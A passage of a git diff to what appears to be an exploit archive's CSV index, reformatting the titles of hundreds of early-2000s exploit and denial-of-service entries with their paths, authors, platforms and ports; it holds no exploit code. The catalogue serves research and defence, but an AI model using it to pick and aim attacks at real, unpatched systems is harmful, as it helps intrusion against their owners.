diff --git a/files.csv b/files.csv index 9045798d3..ffc3ee371 100755 --- a/files.csv +++ b/files.csv @@ -35,7 +35,7 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 < 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0 36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80 -37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 +37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,anonymous,linux,local,0 @@ -50,55 +50,55 @@ id,file,description,date,author,platform,type,port 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80 51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 -52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 +52,platforms/windows/local/52.asm,"ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Bruteforce Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - (nsiislog.dll) Remote Exploit",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504 -59,platforms/hardware/dos/59.c,"Cisco IOS IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 +59,platforms/hardware/dos/59.c,"Cisco IOS - IPv4 Packets Denial of Service Exploit",2003-07-18,l0cK,hardware,dos,0 60,platforms/hardware/dos/60.c,"Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service Exploit",2003-07-21,"Martin Kluge",hardware,dos,0 61,platforms/windows/dos/61.c,"Microsoft Windows 2000 - RPC DCOM Interface DoS Exploit",2003-07-21,Flashsky,windows,dos,0 -62,platforms/hardware/dos/62.sh,"Cisco IOS (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 +62,platforms/hardware/dos/62.sh,"Cisco IOS - (using hping) Remote Denial of Service Exploit",2003-07-22,zerash,hardware,dos,0 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - Remote GID Root Exploit",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - (RPC DCOM) Remote Buffer Overflow Exploit",2003-07-25,Flashsky,windows,remote,135 -65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 +65,platforms/windows/dos/65.c,"Microsoft Windows SQL Server - Denial of Service Remote Exploit (MS03-031)",2003-07-25,refdom,windows,dos,0 66,platforms/windows/remote/66.c,"Microsoft Windows 2000/XP - (RPC DCOM) Remote Exploit (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution Exploit",2003-07-28,"Carl Livitt",multiple,remote,80 68,platforms/linux/dos/68.c,"Linux Kernel <= 2.4.20 - decode_fh Denial of Service Exploit",2003-07-29,"Jared Stanbrough",linux,dos,0 -69,platforms/windows/remote/69.c,"Microsoft Windows RPC DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 +69,platforms/windows/remote/69.c,"Microsoft Windows RPC - DCOM Remote Exploit (18 Targets)",2003-07-29,pHrail,windows,remote,135 70,platforms/windows/remote/70.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (48 Targets)",2003-07-30,anonymous,windows,remote,135 71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0 72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0 73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0 74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21 -75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 +75,platforms/linux/local/75.c,"man-db 2.4.1 - open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0 76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135 -77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 +77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80 78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21 -79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0 +79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server - SYSTEM Exploit",2003-08-13,ash,windows,local,0 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100 38772,platforms/hardware/webapps/38772.txt,"ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities",2015-11-20,"Karn Ganeshen",hardware,webapps,80 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0 82,platforms/windows/dos/82.c,"Piolet Client 1.05 - Remote Denial of Service Exploit",2003-08-20,"Luca Ercoli",windows,dos,0 -83,platforms/windows/remote/83.html,"Microsoft Internet Explorer Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 +83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (M03-032)",2003-08-21,malware,windows,remote,0 84,platforms/linux/remote/84.c,"Gopherd <= 3.0.5 - FTP Gateway Remote Overflow Exploit",2003-08-22,vade79,linux,remote,70 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 - Remote Root Exploit (Windows & Linux)",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow Exploit",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 -90,platforms/windows/remote/90.c,"eMule/xMule/LMule OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 +90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel <= 3.24/4.00 - Daemon Hijacking Proof of Concept Exploit",2003-09-05,"Steve Grubb",linux,local,0 -92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 +92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Local Privilege Escalation Exploit",2003-09-09,"Jon Hart",linux,local,0 94,platforms/multiple/dos/94.c,"MyServer 0.4.3 - DoS",2003-09-08,badpack3t,multiple,dos,80 -95,platforms/multiple/remote/95.c,"Roger Wilco 1.x Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 +95,platforms/multiple/remote/95.c,"Roger Wilco 1.x - Client Data Buffer Overflow Exploit",2003-09-10,"Luigi Auriemma",multiple,remote,0 96,platforms/osx/remote/96.c,"4D WebSTAR FTP Server Suite - Remote Buffer Overflow Exploit",2003-09-11,B-r00t,osx,remote,21 97,platforms/windows/remote/97.c,"Microsoft Windows - (RPC DCOM) Scanner (MS03-039)",2003-09-12,"Doke Scott",windows,remote,135 98,platforms/linux/remote/98.c,"MySQL 3.23.x/4.0.x - Remote Exploit",2003-09-14,bkbll,linux,remote,3306 99,platforms/linux/remote/99.c,"Pine <= 4.56 - Remote Buffer Overflow Exploit",2003-09-16,sorbo,linux,remote,0 100,platforms/windows/remote/100.c,"Microsoft Windows - (RPC DCOM) Long Filename Overflow Exploit (MS03-026)",2003-09-16,ey4s,windows,remote,135 -101,platforms/solaris/remote/101.pl,"Solaris Sadmind Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 +101,platforms/solaris/remote/101.pl,"Solaris Sadmind - Default Configuration Remote Root Exploit",2003-09-19,"H D Moore",solaris,remote,111 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit",2003-09-20,anonymous,linux,remote,617 103,platforms/windows/remote/103.c,"Microsoft Windows - (RPC DCOM2) Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135 104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0 @@ -107,9 +107,9 @@ id,file,description,date,author,platform,type,port 107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21 109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 < 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21 -111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 +111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service - Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow Exploit",2003-10-21,blasty,windows,remote,0 -113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 +113,platforms/windows/dos/113.pl,"Microsoft Exchange 2000 - XEXCH50 Heap Overflow PoC (MS03-046)",2003-10-22,"H D Moore",windows,dos,0 114,platforms/solaris/local/114.c,"Solaris Runtime Linker (ld.so.1) - Buffer Overflow Exploit (SPARC version)",2003-10-27,osker178,solaris,local,0 115,platforms/linux/dos/115.c,"wu-ftpd 2.6.2 - 'wuftpd-freezer.c' Remote Denial of Service Exploit",2003-10-31,"Angelo Rosiello",linux,dos,0 116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server <= 4.10 - Remote Exploit",2003-11-04,xCrZx,windows,remote,515 @@ -117,20 +117,20 @@ id,file,description,date,author,platform,type,port 118,platforms/bsd/local/118.c,"OpenBSD - (ibcs2_exec) Kernel Local Exploit",2003-11-07,"Scott Bartram",bsd,local,0 119,platforms/windows/remote/119.c,"Microsoft Windows 2000/XP - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 120,platforms/linux/local/120.c,"TerminatorX <= 3.81 - Stack Overflow Local Root Exploit",2003-11-13,Li0n7,linux,local,0 -121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 +121,platforms/windows/remote/121.c,"Microsoft Frontpage Server Extensions - fp30reg.dll Exploit (MS03-051)",2003-11-13,Adik,windows,remote,80 122,platforms/windows/local/122.c,"Microsoft Windows - (ListBox/ComboBox Control) Local Exploit (MS03-045)",2003-11-14,xCrZx,windows,local,0 -123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 +123,platforms/windows/remote/123.c,"Microsoft Windows Workstation Service - WKSSVC Remote Exploit (MS03-049)",2003-11-14,snooq,windows,remote,0 124,platforms/windows/remote/124.pl,"IA WebMail 3.x - (iaregdll.dll 1.0.0.5) Remote Exploit",2003-11-19,"Peter Winter-Smith",windows,remote,80 125,platforms/bsd/local/125.c,"OpenBSD 2.x - 3.3 exec_ibcs2_coff_prep_zmagic() Kernel Exploit",2003-11-19,"Sinan Eren",bsd,local,0 126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) <= 1.2.26.1a - Remote Exploit",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution Exploit (Webserver)",2003-11-22,nesumin,windows,remote,0 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Local Root Exploit (Proof of Concept) (1)",2003-12-02,"Christophe Devine",linux,local,0 -130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 +130,platforms/windows/remote/130.c,"Microsoft Windows XP Workstation Service - Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel <= 2.4.22 - 'do_brk()' Local Root Exploit (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow and Denial of Service Exploit",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Root Exploit",2003-12-16,watercloud,hp-ux,local,0 -135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 +135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal Exploit",2003-12-18,kralor,windows,remote,80 137,platforms/php/webapps/137.pl,"phpBB 2.0.6 - search_id SQL Injection MD5 Hash Remote Exploit",2003-12-21,RusH,php,webapps,0 138,platforms/php/webapps/138.pl,"PHP-Nuke <= 6.9 - 'cid' SQL Injection Remote Exploit",2003-12-21,RusH,php,webapps,0 @@ -149,17 +149,17 @@ id,file,description,date,author,platform,type,port 152,platforms/linux/local/152.c,"rsync <= 2.5.7 - Local Stack Overflow Root Exploit",2004-02-13,"Abhisek Datta",linux,local,0 153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.EXE Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 154,platforms/linux/local/154.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Local Proof of Concept (2)",2004-02-18,"Christophe Devine",linux,local,0 -155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 +155,platforms/windows/remote/155.c,"GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow Exploit",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 - Remote Buffer Overflow Exploit (Windows 2000/XP)",2004-02-26,Rave,windows,remote,8080 157,platforms/windows/remote/157.c,"IPSwitch IMail LDAP Daemon - Remote Buffer Overflow Exploit",2004-02-27,"Johnny Cyberpunk",windows,remote,389 158,platforms/windows/remote/158.c,"Serv-U FTPD 3.x/4.x/5.x - (MDTM) Remote Overflow Exploit",2004-02-27,Sam,windows,remote,21 159,platforms/windows/remote/159.c,"WFTPD Server <= 3.21 - Remote Buffer Overflow Exploit",2004-02-29,rdxaxl,windows,remote,21 160,platforms/linux/local/160.c,"Linux Kernel <= 2.2.25 / <= 2.4.24 / <= 2.6.2 - 'mremap()' Missing 'do_munmap' Exploit (1)",2004-03-01,"Paul Starzetz",linux,local,0 161,platforms/windows/dos/161.c,"Red Faction <= 1.20 - Server Reply Remote Buffer Overflow Exploit",2004-03-04,"Luigi Auriemma",windows,dos,0 -163,platforms/windows/remote/163.pl,"Eudora 6.0.3 Attachment Spoofing Exploit (windows)",2004-03-19,anonymous,windows,remote,0 -164,platforms/windows/remote/164.c,"Foxmail 5.0 PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 +163,platforms/windows/remote/163.pl,"Eudora 6.0.3 - Attachment Spoofing Exploit (Windows)",2004-03-19,anonymous,windows,remote,0 +164,platforms/windows/remote/164.c,"Foxmail 5.0 - PunyLib.dll Remote Stack Overflow Exploit",2004-03-23,xfocus,windows,remote,0 165,platforms/windows/remote/165.c,"WS_FTP Server <= 4.0.2 - ALLO Remote Buffer Overflow Exploit",2004-03-23,"Hugh Mann",windows,remote,21 -166,platforms/windows/remote/166.pl,"eSignal 7.6 STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 +166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow Exploit",2004-03-26,VizibleSoft,windows,remote,80 167,platforms/linux/remote/167.c,"Ethereal 0.10.0-0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0 168,platforms/windows/remote/168.c,"RealSecure / Blackice iss_pam1.dll Remote Overflow Exploit",2004-03-28,Sam,windows,remote,0 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products Vulnerabilities Exploit (Cisco Global Exploiter)",2004-03-28,blackangels,hardware,remote,0 @@ -222,33 +222,33 @@ id,file,description,date,author,platform,type,port 231,platforms/linux/local/231.sh,"Pine (Local Message Grabber) Exploit",2000-12-15,mat,linux,local,0 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0 233,platforms/windows/dos/233.pl,"Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit",2000-12-19,"Shane Hird",windows,dos,0 -234,platforms/bsd/remote/234.c,"OpenBSD 2.6 - / 2.7ftpd Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD 2.6 / 2.7ftpd - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21 235,platforms/solaris/dos/235.pl,"SunOS 5.7 Catman - Local Insecure tmp Symlink Clobber Exploit",2000-12-20,lwc,solaris,dos,0 -236,platforms/linux/dos/236.sh,"Redhat 6.1 - / 6.2 TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 +236,platforms/linux/dos/236.sh,"Redhat 6.1 / 6.2 - TTY Flood Users Exploit",2001-01-02,teleh0r,linux,dos,0 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - (TCP/IP Weakness) Exploit",2001-01-02,Stealth,linux,remote,513 238,platforms/linux/dos/238.c,"ml2 - Local users can Crash processes",2001-01-03,Stealth,linux,dos,0 239,platforms/solaris/remote/239.c,"wu-ftpd 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 -240,platforms/solaris/dos/240.sh,"Solaris 2.6 - / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 +240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 - Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 -247,platforms/solaris/local/247.c,"Solaris 2.5 - / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 +247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 249,platforms/linux/local/249.c,"GLIBC - Locale Format Strings Exploit",2003-01-15,logikal,linux,local,0 -250,platforms/solaris/local/250.c,"Solaris 7 - / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 +250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta - arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 - (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow Exploit",2001-01-19,teleh0r,linux,remote,143 254,platforms/hardware/remote/254.c,"Cisco Password Bruteforcer Exploit",2001-01-19,norby,hardware,remote,23 255,platforms/linux/local/255.pl,"Redhat 6.1 man - Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 -256,platforms/solaris/local/256.c,"Solaris 2.6 - / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 +256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 - /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 - Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 258,platforms/linux/local/258.sh,"glibc-2.2 / openssh-2.3.0p1 / glibc <= 2.1.9x - Exploits",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 - (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 -262,platforms/hardware/dos/262.pl,"Cisco Multiple Products Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 +262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 263,platforms/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Exploit",2001-01-27,Fyodor,solaris,remote,80 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service Exploit",2001-05-07,honoriak,novell,dos,0 265,platforms/irix/local/265.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) - /usr/bin/lpstat Local Exploit",2001-05-07,LSD-PLaNET,irix,local,0 @@ -339,7 +339,7 @@ id,file,description,date,author,platform,type,port 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 - SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 -365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 +365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service Exploit (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X - Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 @@ -509,7 +509,7 @@ id,file,description,date,author,platform,type,port 657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0 658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0 -660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 +660,platforms/linux/remote/660.c,"PHP <= 4.3.7/5.0.0RC3 - memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0 663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 - MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0 @@ -646,7 +646,7 @@ id,file,description,date,author,platform,type,port 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21 823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21 -824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0 +824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid)",2005-09-13,Qnix,linux,local,0 825,platforms/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203 827,platforms/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote BoF Exploit",2005-02-18,class101,windows,remote,21 @@ -703,7 +703,7 @@ id,file,description,date,author,platform,type,port 880,platforms/multiple/dos/880.pl,"Freeciv Server <= 2.0.0beta8 - Denial of Service Exploit",2005-03-14,"Nico Spicher",multiple,dos,0 881,platforms/php/webapps/881.txt,"ZPanel <= 2.5 - Remote SQL Injection Exploit",2005-03-15,Mikhail,php,webapps,0 882,platforms/windows/dos/882.cpp,"GoodTech Telnet Server < 5.0.7 - Buffer Overflow Crash Exploit",2005-03-15,Komrade,windows,dos,0 -883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (updated)",2005-04-24,cybertronic,windows,remote,2380 +883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote BoF Exploit (2)",2005-04-24,cybertronic,windows,remote,2380 884,platforms/windows/local/884.cpp,"iSnooker <= 1.6.8 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 885,platforms/windows/local/885.cpp,"iPool <= 1.6.81 - Local Password Disclosure Exploit",2005-03-16,Kozan,windows,local,0 886,platforms/windows/dos/886.pl,"PlatinumFTP <= 1.0.18 - Multiple Remote Denial of Service Exploit",2005-03-17,ports,windows,dos,0 @@ -814,15 +814,15 @@ id,file,description,date,author,platform,type,port 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service Exploit",2005-05-17,"Konrad 